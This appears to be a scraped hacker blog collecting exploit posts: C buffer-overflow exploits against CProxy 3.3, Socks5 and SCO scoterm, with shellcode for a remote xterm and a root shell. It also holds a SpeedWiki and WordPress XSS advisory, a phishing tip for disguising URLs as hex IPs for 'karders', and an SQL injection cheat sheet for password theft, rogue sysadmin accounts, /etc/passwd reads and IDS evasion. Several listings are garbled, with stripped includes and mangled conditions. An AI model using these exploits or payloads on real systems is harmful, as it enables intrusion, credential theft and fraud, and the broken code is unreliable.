Xploits an overflow vulnerability in CProxy 3.3
/*
* Remote Denial of Service for CProxy v3.3 - Service Pack 2
*
*
*
* This program xploits an overflow vulnerability in CProxy 3.3 SP2
* HTTP Service (8080), causing server shutdown
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define BUFFERSIZE 247
#define NOP 0x90
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161
#define EBP 0x61616161
void usage(char *progname) {
fprintf(stderr,"Usage: %s [eip] [ebp]\n",progname);
exit(1);
}
int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024];
unsigned long *long_ptr,eip=EIP, ebp=EBP;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;
fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");
if (argc<2)>=3) eip+=atol(argv[2]);
if (argc>=4) ebp+=atol(argv[3]);
ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-8);
ptr+=sizeof(buffer)-8;
long_ptr=(unsigned long*)ptr;
*(long_ptr++) = ebp;
*(long_ptr++) = eip;
ptr=(char *)long_ptr;
*ptr='\0';
bzero(remotedos, sizeof(remotedos));
snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < he =" gethostbyname(argv[1]))" ip =" *(unsigned">h_addr;
} else {
if ((ip = inet_addr(argv[1])) == NULL) {
perror("inet_addr()");
return -1;
}
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
sin.sin_port = htons(8080);
fprintf(stderr,"\nEngaged...\n");
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) <>
#
Friday by n3kr0
X-ploit Speedwiki 2.0
product :Speedwiki 2.0
vendor site: http://speedywiki.sourceforge.net/
risk:critical
a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms
path : /speedywiki/index.php?upload=1
xss get :
/index.php?showRevisions='">
full path disclosure :
/speedywiki/index.php?showRevisions[]=
/speedywiki/index.php?searchText[]=
/speedywiki/upload.php
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com
#
Sunday by n3kr0
Bug 4 karders
va para todos akellos dedikados al phishing o karders --> pasar la IP a hexadecimal de la web a disfrazar ej. www.google.com --> I.P. dir --> 72.14.207.99 --> hexadecimal http://0x48.0x0e.0xcf.0x63 click para ver ;) karders, su vida vuelve a tomar un nuevo giro lollll
#
Monday by n3kr0
Bug Wordpress 2.0.1
link a explotar: http://host.domain.tld/wp-admin/options-general.php?page=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Fix:
$ svn diff wp-admin/admin.php Index: wp-admin/admin.php
===================================================================
— wp-admin/admin.php (revision 3513)
+++ wp-admin/admin.php (working copy) @@ -61,7 +61,7 @@
} if (! file_exists(ABSPATH . “wp-content/plugins/$plugin_page”))
- die(sprintf(__(’Cannot load %s.’), $plugin_page));
+ die(sprintf(__(’Cannot load %s.’), htmlentities($plugin_page)));
if (! isset($_GET[’noheader’])) require_once(ABSPATH . ‘/wp-admin/admin-header.php’);
;)
#
by n3kr0
Sql Injection
Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
5.Grabbing passwords
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
6.Create DB accounts.
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7.MySQL OS Interaction
- ' union select 1,load_file('/etc/passwd'),1,1,1;
8.Server name and config.
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
9.Retrieving VNC password from registry.
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
10.IDS Signature Evasion.
Evading ' OR 1=1 Signature
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
11.mySQL Input Validation Circumvention using Char().
Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12.IDS Signature Evasion using comments.
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
13.Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
Greets: kaneda, modem, wildcard, #black and pulltheplug.
#
Thursday by n3kr0
Remote exploit for Socks5
/*
* !!!! Private do not distribute !!!!
*
* <1080r2.c> defintive socks5 remote exploit / linux x86
*
* Usage:
* $ xhost +
* $ ./1080r2 [offset]
* => And wait a xterm to be sent back to you...
*
* Vulnerables: (offset)
* socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r10 (compiled on a redhat 6.0) => 400
* socks5-s5watch-1.0r9-2 (redhat-contrib) => no?
* socks5-0.17-1 (redhat 4.2) => no
* socks5-1.0r10-5 (redhat-contrib) => no??
* socks5-server-1.0r6-8TL (TurboContrib) => no??
*
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define NOP 0x90
#define MAXLEN 2000
#define OFFSET 0x7fffd99d // TurboLinux 4.0.5
#define ALIGN 3
#define LENGTH 195
char hell[120]=
"\xeb\x29" // jmp 0x13
"\x5e" // popl %esi
"\x89\x76\x30" // movl %esi,0x30(%esi)
"\x89\xf0" // movl %esi,%eax
"\x83\xc0\x15" // addl $0x15,%eax
"\x89\x46\x34" // movl %eax,0x34(%esi)
"\x83\xc0\x09" // addl $0x9,%eax
"\x89\x46\x38" // movl %eax,0x38(%esi)
"\x31\xc0" // xorl %eax,%eax
"\x89\x46\x3c" // movl %eax,0x3c(%esi)
"\x88\x46\x14" // movb %eax,0x14(%esi)
"\x88\x46\x1d" // movb %eax,0x1d(%esi)
"\xb0\x0b" // movb $0xb,%al
"\x89\xf3" // movl %esi,%ebx
"\x8d\x4e\x30" // leal 0x30(%esi),%ecx
"\x8d\x56\x3c" // leal 0x3c(%esi),%edx
"\xcd\x80" // int $0x80
"\xe8\xd2\xff\xff\xff" // call -0x22
"/usr/X11R6/bin/xtermA"
"-displayA"
//"127.0.0.1:0"
;
char buf[MAXLEN];
main(int argc, char *argv[]) {
struct sockaddr_in to;
char buff[1000];
int sd;
int pktlen;
struct hostent *hp;
int i;
long *addr;
int off;
int alin;
int len;
int offset;
if(argc==4) {
offset=atoi(argv[3]);
} else {
if(argc==3) {
offset=0;
} else {
printf("Uso: ./1080r2 [offset]\n");
exit(0); }
}
len=LENGTH;
off=OFFSET+offset;
alin=ALIGN;
strcat(hell,argv[2]);
strcat(hell,":0");
memset(buf,NOP,len);
memcpy(buf+len-strlen(hell)-1,hell,strlen(hell));
addr=(long *)(buf+alin);
for (i=0;i<46;i+=4)
*(addr++) = off;
buf[len-1]='\0';
to.sin_family=AF_INET;
to.sin_port = htons(1080);
if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0); }
if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0); }
memcpy((char *)&to.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sd,(struct sockaddr *)&to,sizeof(to))!=0) {
perror("connect()");
exit(0); }
printf("Connect: Ready to send overflow...\n");
//getchar();
// inicio
pktlen=3;
buff[0]=0x5; // SOCKS version 5
buff[1]=0x1; // one authentication type...
buff[2]=0x0; // no authentication
//buff[2]=0x2; // userpass
if(write(sd, buff, pktlen)!=pktlen) {
perror("write error");
exit(-1); }
if(read(sd, buff, 2)!=2) {
perror("read error");
exit(-1); }
if(buff[0] != 0x5) {
printf("invalid response\n");
exit(-1); }
if(buff[1] == 0xf) {
printf("proxy requires authenticationn");
exit(-1); }
if(buff[1] != 0x0) {
printf("proxy returned an invalid authentication type\n");
exit(-1); }
// autentificacion
/*
printf("\ndone\n");
printf("sending autentificacion request...");
pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s",
strlen(username), username, strlen(password), password);
send(sd, buff, pktlen, 0);
recv(sd, buff, 2, 0);
if(buff[1] != 0x00) {
printf("username/password invalid\n");
exit (1); }
*/
// conexion
for(i=1;i<=len;i++)
putchar(buf[i]);
printf("\ndone\n");
printf("sending connection request...");
pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c",
0x00, strlen(buf), buf, 0x11, 0x22);
if(write(sd, buff, pktlen)!=pktlen) {
perror("write error");
exit(-1); }
if(read(sd, buff, 4)!=4) {
perror("read error (1)");
exit(-1); }
switch(buff[1]) {
case 0: printf("succeeded\n"); break;
case 1: printf("general SOCKS server failure\n"); exit(-1);
case 2: printf("connection not allowed by ruleset\n"); exit(-1);
case 3: printf("network unreachable\n"); exit(-1);
case 4: printf("host unreachable\n"); exit(-1);
case 5: printf("connection refused\n"); exit(-1);
case 6: printf("TTL expired\n"); exit(-1);
case 7: printf("command not supported (?)\n"); exit(-1);
case 8: printf("address type not supported\n"); exit(-1);
default: printf("returned unknown error code\n"); exit(-1);
}
}
#
by n3kr0
Local root exploit for scoterm
/*
* Local root exploit
*
* Usage:
* $ cc scotermx.c -o scotermx
* $ scoterm
* $ /usr/bin/X11/scoterm -geometry `scotermx 0`
* or
* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`
*
* Note: scoterm need to be run from a valid x-display
*
* By: The Dark Raver of t0s (Murcia/Spain - 21/6/99)
*
* -
*
*/
#include
#include
char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/
#define OFF 0x80452ff // SCO OpenServer 5.0.4
#define ALINEA 1
#define LEN 2000
int main(int argc, char *argv[]) {
int offset=0;
char buf[LEN];
int i;
if(argc <>\n");
exit(0); }
else {
offset=atoi(argv[1]); }
memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i
#
by n3kr0
fuck!!
fuck off!
#
by n3kr0